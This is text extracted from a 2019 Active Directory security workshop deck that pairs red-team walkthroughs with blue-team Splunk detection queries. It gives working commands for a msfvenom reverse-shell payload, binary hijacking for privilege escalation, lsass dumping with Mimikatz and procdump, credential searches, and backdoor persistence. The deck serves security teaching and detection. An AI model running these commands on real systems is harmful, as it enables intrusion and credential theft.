theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf

ACTIVE DIRECTORY SECURITY WORKSHOP
A RED AND BLUE GUIDE TO POPULAR AD ATTACKS

Pentester. Gamer.
• Blog: thevivi.net
• GitHub: github.com/V1V1
• Twitter: @_theVIVI
• Email: gabriel<at>thevivi.net
@_theVIVI (Gabriel)

WHO THIS IS FOR
RED
Pentesters/red teamers.
Understand and walkthrough popular Windows & AD tradecraft.
Find out how you could get detected.
BLUE
Sysadmins/blue teamers.
Understand how attackers compromise and own AD environments.
Mitigation and detection techniques (with basic Splunk queries).

1. INTRO:
 Lab setup. [page 6]
 MITRE ATT&CK. [page 9]
 Tradecraft (Powershell vsC#). [page 11]
2. WINDOWSHOSTRECON &ENUMERATION:
 Mitigation&Detection. [page 23]
3. WINDOWSLOCALPRIVILEGEESCALATION:
 Vulnerability detection. [page 32]
 Autoruns. [page 42]
 ScheduledTasks. [page 48]
 File & registrycredentials. [page 54]
4. CREDENTIAL DUMPING & ACCESS:
 Mimikatz and friends. [page 65]
AGENDA
 Dumping lsass memory. [page 68]
 Browser credentials. [page 74]
 File & registrycredentials. [page 79]
5. WINDOWSHOSTPERSISTENCE:
 Mitigation&Detection. [page 103]
 Registry Persistence (AutoRuns). [page 90]
 Scheduled Tasks. [page 93]
 Microsoft Office Startup. [page 96]
 WMI. [page 99]
6. AD RECON & ENUMERATION:
 BloodHound. [page 116]
 PowerView & SharpView. [page 123]
 Active Directory Module. [page 126]
7. DOMAINPRIVILEGEESCALATION:
 Password Spraying. [page 136]
 Kerberoasting. [page 143]
 AS-REP Roasting. [page 151]
 Targeted Roasting. [page 157]
 Unconstrained Delegation. [page 171]
8. DOMAINPERSISTENCE:
 Golden Tickets. [page 202]
 AdminSDHolder. [page 207]
 DC Shadow. [page 211]
REFERENCES.

Welcome to our playground - FOX.com
LAB SETUP

FOX.com - Systems
 Windows Server 2012 Domain Controller.
 Windows 10 & 7 hosts.
 Single AD forest.
FOX.com - Audit & Logging
 Sysmon on every endpoint. Using @SwiftonSecurity’s sysmon config.
 Decent audit policy deployed using GPO.
 Powershell version 5.1 & enhanced logging on every host.
 Logs being forwarded to a Splunk server for analysis.
FOX.COM DOMAIN

 Accepting the very likely reality thatadversaries have already compromised your network;
regardless of the perimeter defences you’ve deployed.
Image from:https://github.com/infosecn1nja/AD-Attack-Defense
Already happened
ASSUME BREACH

 MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based
on real-world observations.
 These include specific and general techniques,as well as concepts and background information on
well-known adversary groups and their campaigns.
Read more:https://attack.mitre.org/
MITRE ATT&CK™

1) Tactics - Represent the“why” of an ATT&CK technique.The tactic is the adversary’s tactical objective
for performing anaction
2) Techniques - Represent“how”an adversary achieves a tactical objective by performing an action.
Reference: https://medium.com/mitre-attack/att-ck-101-17074d3bc62
ATT&CK TACTICS VS TECHNIQUES

 Over the past few years,Powershell has been used as an
offensive tool in all stages of the attack lifecycle;from initial
compromise to persistence and data exfiltration.
 But security measures such as AMSI, enhanced logging
(module logging,script block logging,transcription) has made
it a lot harder for attackers to operate using Powershell exclusive
tradecraft.
Reference: https://devblogs.microsoft.com/powershell/powershell-
the-blue-team/
TRADECRAFT (POWERSHELL)

 The new kid on the block.
 Justlike Powershell, C # is tightly intergrated with the .NET
framework;making it the one of the best replacements for
Powershell as the tool/language of choice for attacking
Windows and Active Directory environments.
 Also,just like Powershell in the beginning; visibility into
C#/.NET tradecraft isn’t great at the moment, making it much
harder for defenders to detect attacker activity.
 But this is likely to change over time,especially with AMSI’s recent
integration with the .NET Framework.
Reference: https://posts.specterops.io/operational-challenges-in-
offensive-c-355bd232a200
TRADECRAFT (C#)

Source:2019 Threat Detection Report by Red Canary
https://resources.redcanary.com/hubfs/ThreatDetectionReport-2019.pdf
 Attackers and defenders still can’t afford to ignore Powershell tradecraft,so we’ll be taking a look at
both C # and Powershell tooling throughout our lab exercises.
STILL NOT DEAD

2. WINDOWS HOST RECON & ENUMERATION

The situation:
You’ve just compromised a low privileged
user in the FOX.com domain and you want to
get a lay of the land.
WINDOWS HOST RECON & ENUMERATION
Low Priv

 Seatbelt - https://github.com/GhostPack/Seatbelt (C#)
 Reconerator - https://github.com/stufus/reconerator (C#)
 HostEnum-https://github.com/threatexpress/red-team-
scripts/blob/master/HostEnum.ps1(Powershell)
 Manual enumeration (using commands) -
https://wiki.skullsecurity.org/Windows_Commands
HOST ENUMERATION TOOLS

 Seatbelt performs numerous host enumeration checks.
Usage:
#Collect system related data
SeatBelt.exe system
#Collect user related data
SeatBelt.exe user
#Run all checks
SeatBelt.exe all
#Run a specific check
SeatBelt.exe CHECK-NAME
HOST ENUMERATION - SEATBELT

 Running SeatBelt’s system checks.
HOST ENUMERATION - SEATBELT

 Collects basic host information.
Usage:
#Run all checks
Reconerator.exe basic all
HOST ENUMERATION - RECONERATOR

 Runs numerous host or domain checks and provides formatted output.
Usage:
#Bypass Powershell execution policy
$env:psexecutionpolicypreference="bypass“
#Import the script (can be from remote source)
Import-Module .HostEnum.ps1
#Run host enumeration checks
Invoke-HostEnum -Local
HOST ENUMERATION - HOSTENUM

#Run checks and write HTML output report to disk
Invoke-HostEnum -Local -HTMLReport
HOST ENUMERATION - HOSTENUM

 If you can avoid using commands to enumerate a system,then do it.
 Command line values are pretty easy to detect in environments with decent endpoint logging,so always use
scripts/code to enumerate systems whenever you can.
 That said,you can gather a lot of user and system related information using regularWindows commands.
systeminfo
whoami /all
ipconfig /all
net user
netstat –ano
tasklist /v
sc query
netsh firewall show config
And a lot more: https://wiki.skullsecurity.org/Windows_Commands
HOST ENUMERATION - COMMANDS

RELATEDMITRETACTICS&TECHNIQUES:
 Discovery - https://attack.mitre.org/tactics/TA0007/
 Command Line - https://attack.mitre.org/techniques/T1059/
 Powershell - https://attack.mitre.org/techniques/T1086/
MITIGATION & DETECTION – HOST ENUMERATION

 Ifyou have command line logging setup, it shouldn’t be too hard to detect commonly used enumeration command
line values in your environment. Especially if they’re coming from PCs used by non-IT/technicalusers.
index=* CommandLine=* User!=*NT AUTHORITY*
| eval length=len(CommandLine)
| table length, CommandLine, ComputerName, User
| sort -length
MITIGATION & DETECTION – COMMAND LINE

 Enhanced Powershell logging is an absolute must if you want to gain visibility into Powershell tradecraft.
 Some of the event IDs you may be interested in; Event ID 4103 (Module Logging) & 4104 (Script Block Logging).
Reference: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
index=* sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" EventCode=4104
MITIGATION & DETECTION – POWERSHELL

 If the feature hasn’t been disabled on the target system, attackers can easily bypass enhanced Powershell logging by
downgrading their Powershell session to version 2.

 After upgrading Powershell to a more recent version across your environment, disable Powershell version 2 on all your
endpoints (can be done via GPO).
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
 NOTE: You can also detect PS session downgrades by monitoring EventID 400 and filtering logs with EngineVersion=2.*.

 Application whitelisting is one of the best methods to limit host enumeration and other attacker activity.
 It’s definitely not easy to implement in real-word networks; but if done correctly, it can severely limit what an
attacker can do on a compromised system.
Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-
application-control/applocker/what-is-applocker
MITIGATION & DETECTION – APPLICATION WHITELISTING

3. WINDOWS LOCAL PRIVILEGE ESCALATION

The situation:
You’re done enumerating the system you
compromised and you want to elevate your
privileges and gain local admin rights.
WINDOWS LOCAL PRIVILEGE ESCALATION
Low Priv

Vulnerability Detection:
 WindowsExploit Suggester (Next Generation) -
https://github.com/bitsadmin/wesng
 Sherlock &Watson:
 https://github.com/rasta-mouse/Sherlock (Powershell)
 https://github.com/rasta-mouse/Watson (C#)
Configuration Abuse:
 PowerUp&SharpUp:
 https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
(Powershell)
 https://github.com/GhostPack/SharpUp (C#)
LOCAL PRIVILEGE ESCALATION TOOLS

Windows Exploit Suggester (Next Generation) - https://github.com/bitsadmin/wesng
 Takes the output of the systeminfo command as input and provides a list of vulnerabilities the OS is
vulnerable to by enumerating missing patches.
Usage:
#Detect all vulnerabilities
python wes.py SYSINFO-FILE
#Show vulnerabilities with exploits
python wes.py SYSINFO-FILE --exploits-only
#Show only privesc vulnerabilities with exploits
python wes.py SYSINFO-FILE --exploits-only --impact "Elevation of Privilege"
LOCAL PRIVESC – WES(NG)

 NOTE:There’s no guarantee the linked exploits will work or that you’ll come across anything other than simple POCs.
 It will still take some effort on your part to find or build something that works.
LOCAL PRIVESC – WES(NG)

 Sherlock –Powershell script to enumerate missing patches and provide working vulnerabilities
(deprecated but still useful inWindows 7 andWindows Server 2012 environments).
 Watson - .NET program (C#) to enumerate missing patches and provide working vulnerabilities (useful
in Windows 10 andWindows Server 2016/2019 environments).
Sherlock Usage:
#Bypass Powershell execution policy
$env:PSExecutionPolicyPreference="bypass“
#Import all Sherlock and run vulnerability checks
Import-Module .Sherlock.ps1
Find-AllVulns
WatsonUsage:
#Runvulnerabilitychecks
Watson.exe
LOCAL PRIVESC – SHERLOCK & WATSON

• No kernel exploits in FOX.com.
• We’re going to focus on feature and misconfiguration abuse to elevate our privileges ;)
LOCAL PRIVESC – WATSON

 Looking for a great way to practice various privilege escalation attacks in your lab?
Windows/LinuxLocalPrivilegeEscalationWorkshop–https://github.com/sagishahar/lpeworkshop
 This is probably one of the most comprehensive and practical privesc resources out there right now.
 Simply login as a local administrator on your lab system, clone the GitHub repository and run the batch script to
make your Windows box vulnerable to a number of misconfiguration based privesc vulnerabilities.
LOCAL PRIVESC – LPE WORKSHOP

 Making our target box vulnerable.
LOCAL PRIVESC – LPE WORKSHOP

 PowerUp–PowershellscripttoenumeratenumerousWindowsprivilegeescalationpaths/vectorsthatrelyon
misconfigurations;notkernel/softwareexploits.
 SharpUp–AC#portofsomeofPowerUp’sfunctionality.
PowerUpUsage:
#BypassPowershellexecutionpolicy
$env:PSExecutionPolicyPreference="bypass“
#ImportPowerUpandrunallprivescchecks
Import-Module.PowerUp.ps1
Invoke-AllChecks
LOCAL PRIVESC – POWERUP & SHARPUP
SharUpUsage:
#Runvulnerabilitychecks
SharpUp.exe

 Run and RunOnce registry keys cause programs to run each time that a user logs on.
 They are sometimes used by admins/installed software in organisations to run specific
programs/utilities every time a user logs in.
 But what if we can modify the program that runs and force our malicious program to run with admin
rights?
Reference – https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
LOCAL PRIVESC – REGISTRY AUTORUNS

 Detecting the issue:PowerUp/SharpUp can do this for us.

 Verify that we can actually modify the AutoRun program
(get-acl -Path "C:Program FilesAutorunProgramprogram.exe").access | ft
IdentityReference,FileSystemRights,AccessControlType,IsInherited,InheritanceFlags -auto

 Prepare a malicious program/stager using whatever C2 solution you’re using.We’ll use Metasploit for an easy demo.
msfvenom -p windows/meterpreter/reverse_https lhost=IP-ADDRESS lport=PORT -f exe -o program.exe

 Replace the vulnerable AutoRun program with ours.
copy program.exe 'C:Program FilesAutorunProgram'
ls 'C:Program FilesAutorunProgram'

 Wait for an administrator to login and we get an elevated shell.

 Scheduled tasks allow PC admins to automatically schedule & execute routine tasks on a chosen computer.
 They do this by setting specific criteria to initiate the tasks (triggers) and then executing the tasks when the
criteria is met. They can be run at logon, at a specific time/date/week, when a system event occurs etc.
 Since they are a lot more flexible than AutoRuns, they often preferred by sysadmins to run routine
programs/utilities such as daily backup scripts.
Reference – https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page
LOCAL PRIVESC – SCHEDULED TASKS

 Let’s hunt for vulnerable scheduled tasks on our target user’s PC.
schtasks /query

schtasks /query /tn TASK-NAME /fo List /v

 Check that we have write permissions on the missing binary’s directory.
(get-acl -Path "C:Missing Scheduled Binary").access | ft
IdentityReference,FileSystemRights,AccessControlType,IsInherited,InheritanceFlags -auto

 Replace the binary with our malicious payload:
copy program.exe "C:Missing Scheduled Binary"
ls "C:Missing Scheduled Binary"

 Wait for a user to login and we get an elevated shell (NT AUTHORITYSYSTEM).

 Some legacy programs and misconfigured systems sometimes store cleartext credentials in files or
the systems registry. Look for these credentials since they can sometimes belong to accounts with
local administrator rights.
#Search for credentials in registry:
reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#Search for credentials in files:
findstr /si password *.txt
findstr /si password *.csv
findstr /si password *.xml
findstr /si password *.ini
LOCAL PRIVESC – CREDENTIALS IN FILES & REGISTRY

LOCAL PRIVESC – CREDENTIALS IN REGISTRY

LOCAL PRIVESC – CREDENTIALS IN FILES
 Using PowerView to extract plaintext passwords from McAfee's SiteList.xml files.
Get-SiteListPassword

RELATEDMITRETACTICS&TECHNIQUES:
 Privilege Escalation - https://attack.mitre.org/tactics/TA0004/
 Exploitation for Privilege Escalation -
https://attack.mitre.org/techniques/T1068/
 File System PermissionsWeakness -
https://attack.mitre.org/techniques/T1044/
 ScheduledTask - https://attack.mitre.org/techniques/T1053/
 Credentials in Files - https://attack.mitre.org/techniques/T1081/
 Credentials in Registry - https://attack.mitre.org/techniques/T1214/
MITIGATION & DETECTION – LOCAL PRIVESC
Hunting for Windows Privesc reference:
https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

 Decent patch management will stop majority of attackers from abusing publically available exploits.
 Remember to focus on patching both the operating system and installed programs.
MITIGATION & DETECTION – PRIVESC EXPLOITS

 Ifyou’vegotcommandlineandPowershellloggingconfigured,youmaybeabletodetecttheuseofprivesc
supporttoolsbeforeanattackercandotoomuchdamage.
 Noguaranteesyou’llcatchthemintime,butitdoesn’thurttotry.
MITIGATION & DETECTION – PRIVESC TOOLS

 Use tools like AutoRuns from the Sysinternals suite to audit any custom administrator tasks/configurations that can
possibly be used to elevate privileges by attackers.
 Require all custom executables & scripts be placed in write-protected directories.
MITIGATION & DETECTION – CONFIGURATION AUDIT

 Always run your initial host enumeration checks again once you’ve gained local admin rights.
 You’ll be able to access tons of information you couldn’t have touched as a low integrity user.
ATTACKER POST PRIVESC TIP

4. CREDENTIAL DUMPING & ACCESS

The situation:
We now have local admin rights on our
initially compromised user.Let’s dump
those passwords.
CREDENTIAL DUMPING & ACCESS
High Priv

 Mimikatz and friends:
 Mimikatz - https://github.com/gentilkiwi (C)
 Invoke-Mimikatz -
https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration (Powershell)
 SafetyKatz - https://github.com/GhostPack/SafetyKatz (C#)
 SharpDump - https://github.com/GhostPack/SharpDump.git (C#)
 Procdump – https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
 SharpWeb - https://github.com/djhohnstein/SharpWeb (C#)
CREDENTIAL ACCESS TOOLS

 Mimikatz is a tool written in C that is frequently used to abuse Windows security and authentication.
 Its most common use is extracting plaintext passwords from Windows PCs, but it’s capable of a lot
more. Due to its popularity, it’s been ported into various languages and included in numerous tools.
Reference:https://github.com/gentilkiwi/mimikatz/wiki
CREDENTIAL ACCESS – MIMIKATZ & FRIENDS

Usage:
#BypassPowershell execution policy,import the Mimikatz script and dump logon credentials on the local PC (requires local admin rights).
$env:PSExecutionPolicyPreference="bypass"
Import-Module .PowerSploitPowerSploit.psd1
Invoke-Mimikatz -DumpCreds
CREDENTIAL ACCESS – INVOKE-MIMIKATZ

S a f e t y K a t z - h t t p s : / / g i t h u b. c o m / G h o s t Pa c k / S a f e t y K a t z
 C # i m p l e m e n t a t i o n o f M i m i k a t z t h a t f i r s t c re a t e s a m e m o r y d u m p o f L S A S S. e xe, w r i t e s i t t o d i s k
i n t h e “ C : W i n d ow s Te m p ” f o l d e r by d e f a u l t a n d i m m e d i a t e l y u s e s M i m i k a t z ’s l o g o n p a s s wo rd s
c o m m a n d t o e x t ra c t c l e a r t e x t W i n d ow s c re d e n t i a l s f ro m t h e d u m p f i l e .
 O n c e t h e p a s s wo rd s h a ve b e e n e x t ra c t e d , t h e d u m p f i l e i s a u t o m a t i c a l l y d e l e t e d .
Us a ge :
S a f e t y K a t z . e xe
CREDENTIAL ACCESS – SAFETYKATZ

S h a r p D u m p - h t t p s : / / g i t h u b. c o m / G h o s t P a c k / S h a r p D u m p
 C # t o o l t h a t i s u s e d t o c re a t e a m i n i d u m p f o r s p e c i f i e d p ro c e s s I D ( L S A S S. e xe by d e f a u l t ) . T h e d u m p
f i l e i s t h e n w r i t t e n t o t h e C : W i n d ow s Te m p d i re c t o r y a n d a u t o m a t i c a l l y c o m p re s s e d i n t o G Z I P
f o r m a t . A n a t t a c ke r w i l l t h e n h a ve t o e x t ra c t t h e f i l e a n d u s e M i m i k a t z o n a s y s t e m t h ey c o n t ro l t o
e x t ra c t l o g o n c re d e n t i a l s .
U s a g e :
S h a r p D u m p. e xe P R O C E S S - I D
CREDENTIAL ACCESS – SHARPDUMP

 Using Mimikatz on an attacker controlled system to extract credentials from the dump file.
Usage:
mimikatz.exe
sekurlsa::minidump DUMPFILE
sekurlsa::logonPasswords full
CREDENTIAL ACCESS – SHARPDUMP

 A Sysinternals tool that can be used to monitor applications for spikes and generate dump
files when they crash. It also can serve as a general process dump utility.
Reference: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
CREDENTIAL ACCESS – PROCDUMP

 If you’re not too concerned about dropping files to disk during your assessments,then using procdump to dump
process memory isone of the best ways to stay undetected.
 Unlike the other tools we’ve covered,it’salegitimate (and signed) Microsoft program that USUALLY doesn’t raise
any alarms in EDR/AV products.
CREDENTIAL ACCESS – PROCDUMP vs OTHER TOOLS

Usage:
procdump64.exe -accepteula -ma PIDDUMP-FILE

 Once the dump file has been extracted, Mimikatz can then be used to dump logon passwords.
Usage:
mimikatz.exe
sekurlsa::minidump DUMP-FILE
sekurlsa::logonPasswords full

 A C# tool used to extract saved logins from popular browsers (Chrome, Firefox &
Internet Explorer/Edge).
Usage:
SharpWeb.exe chrome
SharpWeb.exe firefox
SharpWeb.exe edge
SharpWeb.exe all
Image from: https://github.com/djhohnstein/SharpWeb
CREDENTIAL ACCESS – SHARPWEB

 But what if your tools fail you? (which they often do)
 You may still be able to manuallyextractcredentials from browser memory.
CREDENTIAL ACCESS – DUMPING BROWSER MEMORY

 Let’s start by dumping our target’s browser process memory; preferably while our target has logged
into a few websites.
 We can use procdump/SharpDump to do this.You may need to do dump multiple browser processes.

 Once we’ve extracted the dump file(s) we can analyze them using strings or a hex editor on
our attacker system and search for possible username and password strings.
strings DUMP-FILE | grep “password”

 Using a hex editor to search for usernames/passwords.

 Don’t forget to look for passwords in files and in registry.
CREDENTIAL ACCESS – FILE & REGISTRY CREDENTIALS

RELATEDMITRETACTICS &TECHNIQUES:
 CredentialAccess-https://attack.mitre.org/tactics/TA0006/
 CredentialDumping -https://attack.mitre.org/techniques/T1003/
 CredentialsinFiles-https://attack.mitre.org/techniques/T1081/
 CredentialsinRegistry-https://attack.mitre.org/techniques/T1214/
 Software(Mimikatz)-https://attack.mitre.org/software/S0002/
MITIGATION & DETECTION – CREDENTIAL ACCESS

 Command line detections aren’t the most reliable since they can easily be manipulated by attackers,
but you should still look for possible credential dumping command lines in your environment.
index=windows EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*"
| table ComputerName, User, Image, CommandLine
MITIGATION & DETECTION – CRED DUMPING COMMAND LINE
All invocations of
procdump.exe
containing the string “lsass”

 Attacker usage of SysInternals tools will almost always include the “-accepteula” string.
index=windows EventCode=1 CommandLine=*-accepteula*
| table ComputerName, User, Image, CommandLine
MITIGATION & DETECTION – SYSINTERNALS

 Since dumping Windows credentials needs access to lsass.exe, it may make more sense to hunt for all
process access (Sysmon EventID 10) events that target lsass.exe.
index=windows EventCode=10 TargetImage="C:WINDOWSsystem32lsass.exe" GrantedAccess="0x1FFFFF"
| stats values(SourceImage), values(TargetImage), values(ComputerName) as Host
MITIGATION & DETECTION – LSASS ACCESS

 SafetyKatz and SharpDump write .bin files containing the “debug” prefix in their filenames to the
“C:WindowsTemp” directory by default. Unless an attacker changes this behavior, you can filter file
creation events (Sysmon EventID 11) to detect their usage.
index=* host="fox-pc-zero" EventCode=11 TargetFilename="*debug*.bin"
| table ComputerName, User, Image, TargetFilename
MITIGATION & DETECTION – GHOSTPACK

 Use a Master Password or a password manager to store browser credentials.
MITIGATION & DETECTION – BROWSER PASSWORDS

 Passwords in files? Just don’t do it.
MITIGATION & DETECTION – PASSWORDS IN FILES

The situation:
We don’t want to lose our foothold on our
compromised user,so let’s establish
persistence on their PC.
WINDOWS HOST PERSISTENCE
High Priv

 Persistence can be established in 2 general levels:
 Userland - with regular/non-privileged user rights.
 Elevated - with local admin or SYSTEM rights.
WINDOWS HOST PERSISTENCE 101

 Depending on our level of access, we can set registry values that run a program of our choice every
time a user logs in to the system.
#Userland AutoRun Persistence:
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v Backdoor /t REG_SZ /d
C:UsersmillerDesktopPurpleHazebackdoor.exe
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"
#Elevated AutoRun Persistence:
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v Backdoor /t REG_SZ /d
C:UsersmillerDesktopPurpleHazebackdoor.exe
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"
Reference: https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
WINDOWS HOST PERSISTENCE – REGISTRY AUTORUNS

WINDOWS HOST PERSISTENCE – REGISTRY AUTORUNS (USERLAND)

WINDOWS HOST PERSISTENCE – REGISTRY AUTORUNS (ELEVATED)

 Scheduled tasks allow us to choose the exact time/date we’d like our trigger our backdoor and the user
we’d like to run the program as (assuming we have the rights to do this).
#Userland Scheduled Task Persistence:
schtasks /create /tn "Scheduled_Persistence" /tr "cmd.exe /c C:UsersmillerDesktopPurpleHazebackdoor.exe" /sc daily /st 18:30
schtasks /query /tn Scheduled_Persistence /fo List /v
#Elevated Scheduled Task Persistence:
schtasks /create /ru "SYSTEM" /tn "System_Persistence" /tr "cmd.exe /c C:UsersmillerDesktopPurpleHazebackdoor.exe" /sc daily
/st 18:36
schtasks /query /tn System_Persistence /fo List /v
Reference – https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page
WINDOWS HOST PERSISTENCE – SCHEDULED TASKS

WINDOWS HOST PERSISTENCE – SCHEDULED TASKS (USERLAND)

WINDOWS HOST PERSISTENCE – SCHEDULED TASKS (ELEVATED)

 Microsoft Office is a suite of programs guaranteed to be installed in almost every modern organisation.
 There are numerous methods to abuse the application’s configuration to execute your persistence
payload every time an Office application is launched.
 We’ll use a commonly abused DLL backdoor (check out the links at the bottom for cooler Office
persistence methods).
#Backdoor office using a malicious DLL and a special registry key:
reg add "HKEY_CURRENT_USERSoftwareMicrosoftOffice testSpecialPerf" /t REG_SZ /d
C:UsersmillerDesktopPurpleHazebackdoor.dll
reg query "HKEY_CURRENT_USERSoftwareMicrosoftOffice testSpecialPerf"
Office persistence techniques:
https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
https://medium.com/@dmchell/persistence-the-continued-or-prolonged-existence-of-something-e29ea63e5c9a
WINDOWS HOST PERSISTENCE – OFFICE APPLICATION STARTUP

 Every time our target user launches an Office program, we get a shell.

 One of my personal favorites. WMI (Windows Management Instrumentation) persistence requires admin rights to
establish but is usually worth the effort since it’s relatively difficult to detect and even harder to remove.
 It also allows an attacker to get pretty creative with their persistence trigger conditions.
 We’ll use @infosecn1nja’s Powershell script and modify it a little to trigger our malicious payload every time the user
launches Notepad.
WINDOWS HOST PERSISTENCE – WMI

 Modify the script with a new trigger condition (process start of notepad.exe).
Reference: https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/

 Execute the script with admin rights on the target system.

 Every time our target user launches Notepad, we get a shell.

 Persistence-https://attack.mitre.org/tactics/TA0003/
 RegistryRunKeys-https://attack.mitre.org/techniques/T1060/
 OfficeApplicationStartup-https://attack.mitre.org/techniques/T1137/
 WMIEventSubscription-https://attack.mitre.org/techniques/T1084/
MITIGATION & DETECTION – HOST PERSISTENCE

 Monitor registry events (Sysmon Event 12, 13 & 14) for anomalous values added to registry. Filter out
suspicious programs/files added to registry keys (e.g. executables, scripts, DLL files etc.)
host=“HOSTNAME" EventCode=12 EventType=CreateKey
| table ComputerName, EventType, TaskCategory, TargetObject
MITIGATION & DETECTION – REGISTRY PERSISTENCE

host=“HOSTNAME" EventCode=13 Details="*.exe"
| stats count by ComputerName, TaskCategory, TargetObject, Details
MITIGATION & DETECTION – REGISTRY PERSISTENCE

 Monitor task scheduler create and modify logs (Event ID 4698 & 4702).
 Consider filtering out scheduled tasks created by computer accounts to reduce the noise.
host=“HOSTNAME" EventCode=4698 Account_Name!="*$"
| table ComputerName, Account_Name, Task_Name, Message
MITIGATION & DETECTION – SCHEDULED TASK PERSISTENCE

MITIGATION & DETECTION – SCHEDULED TASK PERSISTENCE

 Office persistence mechanisms usually require some sort of change to registry or file writes to Microsoft Office
directories (e.g. Trusted Locations). Monitor registry and file based events for Office persistence artifacts.
host=“HOSTNAME" EventCode=13 TargetObject="*Office test*" Details="*.dll"
| table ComputerName, TaskCategory, TargetObject, Details
MITIGATION & DETECTION – OFFICE PERSISTENCE
Office persistence techniques:
https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

 Monitor WMI Event activity (Sysmon Event ID 19, 20 & 21) for suspicious WMI Query and Consumer activity.
host=“HOSTNAME" EventCode=19
| table ComputerName, User, Operation, Query
MITIGATION & DETECTION – WMI PERSISTENCE

host="fox-pc-zero" EventCode=20
| table ComputerName, User, Operation, Type, Destination
MITIGATION & DETECTION – WMI PERSISTENCE

 Autoruns from Sysinternals is invaluable for host-level persistence detection/hunting.
MITIGATION & DETECTION – AUTORUNS
Registry AutoRun
Scheduled Task
WMI

6. ACTIVE DIRECTORY RECON & ENUMERATION

The situation:
We’ve established a persistent foothold on our
compromised user and acquired local admin
rights on their PC.Now we want to gather as
much information as possible about the
FOX.com domain for later AD targeted attacks.
WINDOWS HOST PERSISTENCE
High Priv

 Active directory architecture can be pretty simple (single forest networks) or exceptionally
complicated (multiple forests and trust relationships).
 Regardless of the AD design, you’re usually looking for the same type of information to guide you
in your attack:
 Domain, trust & forest details.
 User and group information (including High Value Targets/HVTs e.g. admins).
 Computers, network shares, services (web services, database services etc).
 ACLS, GPOs, OUs and other AD configurations.
 NOTE: FOX.com is a single AD forest, so we won’t be covering any cross trust recon or attacks.
AD RECON & ENUMERATION 101

 BloodHound - https://github.com/BloodHoundAD/BloodHound
 PowerView & SharpView:
 PowerView - https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon
(Powershell)
 SharpView - https://github.com/tevora-threat/SharpView (C#)
 Active Directory Module – https://docs.microsoft.com/en-
us/powershell/module/addsadministration/ (Powershell)
AD RECON TOOLS

 An application used to visualize Active Directory environments.
 BloodHound uses graph theory to reveal the hidden and often unintended relationships within an
Active Directory environment. This helps attackers find simple and complex attack paths to abuse.
 BloodHound is a must have tool in your arsenal if you’re involved in attacking or defending AD.
Reference:
https://github.com/BloodHoundAD/BloodHound/wiki
https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/
AD RECON– BLOODHOUND

 BloodHound uses 2 ingestors to collect information from AD connected systems; a C# binary and a
Powershell script. Both support numerous command line options that affect the type of data
BloodHound collects and how it goes about collecting it.
#Data collection using Powershell script
$env:psexecutionpolicypreference="bypass"
Import-Module .SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain fox.com -ZipFileName C:WindowsTempbh1.zip
#Data collection using C# binary
.Sharphound.exe --CollectionMethod All --Domain fox.com --ZipFileName C:WindowsTempbh2.zip
#If you’re interested, there’s also a Python ingestor developed by Fox-IT here:
